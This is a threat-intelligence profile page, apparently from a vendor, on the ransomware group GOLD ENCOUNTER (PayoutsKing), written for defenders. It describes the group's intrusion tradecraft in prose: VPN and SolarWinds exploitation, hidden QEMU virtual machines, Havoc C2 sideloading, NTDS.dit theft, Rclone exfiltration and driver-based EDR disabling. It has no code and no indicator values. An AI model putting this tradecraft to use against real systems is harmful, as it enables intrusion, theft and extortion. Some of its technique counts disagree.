5 malware familiesExploits CVEs in the wild

GOLD ENCOUNTER

Also known asGOLD ENCOUNTER

GOLD ENCOUNTER is a financially motivated cybercriminal threat group attributed to the PayoutsKing ransomware and double-extortion operation, active since mid-2025. The group steals data and encrypts victim files before demanding payment, and reporting states that PayoutsKing is not operated as a ransomware-as-a-service model and does not rely on affiliates. GOLD ENCOUNTER has been linked to the STAC4713 campaign and is described as targeting hypervisors and using encryptors for VMware and ESXi environments. Content also notes reported links to former BlackBasta affiliates. Observed initial access methods include targeting exposed Cisco and SonicWall SSL VPN devices, exploitation of SolarWinds Web Help Desk vulnerability CVE-2025-26399, and email-bombing or phishing that leads to Microsoft Teams vishing and Quick Assist abuse. Post-compromise activity includes use of QuickAssist and SuperOps for remote management, DLL sideloading to launch Havoc C2, and establishment of SSH backdoors using AdaptixC2 or OpenSSH. The group has also been observed abusing QEMU to run hidden Alpine Linux virtual machines as SYSTEM, including via a scheduled task named TPMProfiler, with disguised virtual disk images, port forwarding, and reverse SSH tunnels to evade host-based security controls. Credential access and collection activity includes copying NTDS.dit and the SAM and SYSTEM hives via SMB using the print command, as well as use of shadow copies. Data theft and staging have involved WinSCP and Rclone, including exfiltration to remote SFTP locations. Defense evasion includes attempts to disable antivirus and EDR using a bring-your-own-vulnerable-driver technique. Tooling directly associated in the content includes PayoutsKing ransomware, QEMU, Havoc C2, AdaptixC2, OpenSSH, QuickAssist, SuperOps, WinSCP, Rclone, Chisel, BusyBox, wg-obfuscator, and WebDAV hosting. Known aliases and related naming in the content include PayoutsKing Group for the ransomware operation. GOLD ENCOUNTER is the attributed threat group name.

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial

MITRE ATT&CK

Tradecraft

26 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

11 of 15 tactics35 techniques×N= number of intelligence reports citing this technique

MITRE ATT&CK

TA0001

Initial Access

4 techniques

T1078

Valid Accounts

T1133×3

External Remote Services

T1190×3

Exploit Public-Facing Application

T1566×4

Phishing

T1566.003

Spearphishing via Service

TA0002

Execution

3 techniques

T1053

Scheduled Task/Job

T1053.005

Scheduled Task

T1059

Command and Scripting Interpreter

T1569

System Services

T1569.002

Service Execution

TA0003

Persistence

3 techniques

T1053

Scheduled Task/Job

T1053.005

Scheduled Task

T1078

Valid Accounts

T1133×3

External Remote Services

TA0004

Privilege Escalation

2 techniques

T1053

Scheduled Task/Job

T1053.005

Scheduled Task

T1078

Valid Accounts

TA0005

Stealth

3 techniques

T1036

Masquerading

T1078

Valid Accounts

T1497×6

Virtualization/Sandbox Evasion

TA0006

Credential Access

1 technique

T1003×3

OS Credential Dumping

T1003.003

NTDS

TA0007

Discovery

2 techniques

T1018

Remote System Discovery

T1497×6

Virtualization/Sandbox Evasion

TA0008

Lateral Movement

1 technique

T1021

Remote Services

T1021.002

SMB/Windows Admin Shares

T1021.004×2

SSH

TA0011

Command and Control

3 techniques

T1090

Proxy

T1090.002×2

External Proxy

T1105

Ingress Tool Transfer

T1219

Remote Access Tools

TA0010

Exfiltration

3 techniques

T1041

Exfiltration Over C2 Channel

T1048×3

Exfiltration Over Alternative Protocol

T1567

Exfiltration Over Web Service

TA0040

Impact

1 technique

T1486×3

Data Encrypted for Impact

ARSENAL

Associated malware families

5 malware families attributed to this actor across reporting.

FamilyContextEvidenceLast seen

HavocThe group has also used a DLL sideloading technique to launch the Havoc C2 post-exploitation framework, and establishes an SSH backdoor via AdaptixC2 or OpenSSH.3May 26, 2026

PayoutsKingGOLD ENCOUNTER is a cybercriminal threat group that operators the PayoutsKing double extortion operation, stealing data and encrypting files before demanding a ransom payment from victims.3May 26, 2026

Payouts KingThe Payouts King ransomware, associated with a threat actor group (GOLD ENCOUNTER, with links to former BlackBasta affiliates), demonstrates a clear advancement toward virtualization-based evasion and covert execution strategies.2May 26, 2026

AdaptixC2The group has also used a DLL sideloading technique to launch the Havoc C2 post-exploitation framework, and establishes an SSH backdoor via AdaptixC2 or OpenSSH.1May 26, 2026

QEMUThe Payouts King ransomware operation is leveraging the QEMU emulator to create hidden virtual machines and establish reverse SSH backdoors on compromised systems, allowing them to bypass endpoint security measures.1Apr 20, 2026

WEAPONIZED

Associated vulnerabilities

1 CVE this actor has used in observed campaigns. 1 of them exploited in the wild.

CVE-2025-26399Unauthenticated AjaxProxy deserialization RCE in SolarWinds Web Help DeskIn the wildEvidence2

Older incidents leveraged exposed SonicWall VPNs that did not have multi-factor authentication (MFA) enabled, while a January 2026 incident exploited a SolarWinds Web Help Desk vulnerability (CVE-2025-26399). In February, Microsoft and Huntress reported similar observations of this vulnerability leading to QEMU deployment.

IOCS

Observables

5 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

5 IOCsView more in app

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

7 SOURCESView more in app

cyfirma otherNews

May 15, 2026

TRACKING RANSOMWARE : APRIL 2026 - CYFIRMA

A threat actor group linked to Payouts King and former BlackBasta affiliates, using stealth-focused ransomware tradecraft including virtualization-based evasion and enterprise compromise techniques.

scworldNews

Apr 20, 2026

Payouts King ransomware abuses QEMU for hidden VMs and backdoors | brief | SC Media

Conducting ransomware intrusions using QEMU to create hidden virtual machines for credential harvesting, data exfiltration, evasion of endpoint security, and reverse SSH backdoor access.

cyber security newsNews

Apr 20, 2026

Attackers Turn QEMU Into a Stealth Backdoor for Credential Theft and Ransomware

Threat group attributed to the STAC4713 campaign and linked to the PayoutsKing ransomware operation. It targets hypervisor environments and has developed encryptors for VMware and ESXi platforms, while using QEMU-based hidden VMs to evade detection and support credential theft and ransomware activity.

security affairsNews

Apr 18, 2026

Hidden VMs: how hackers leverage QEMU to stealthily steal data and spread malware

Threat group attributed with the PayoutsKing ransomware and extortion operation, focused on hypervisors and virtualized environments including VMware and ESXi.

+3 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.

Start free trial

Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping26

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal5

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs1

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables5

Domains, IPs, and hashes tied to this actor, refreshed continuously.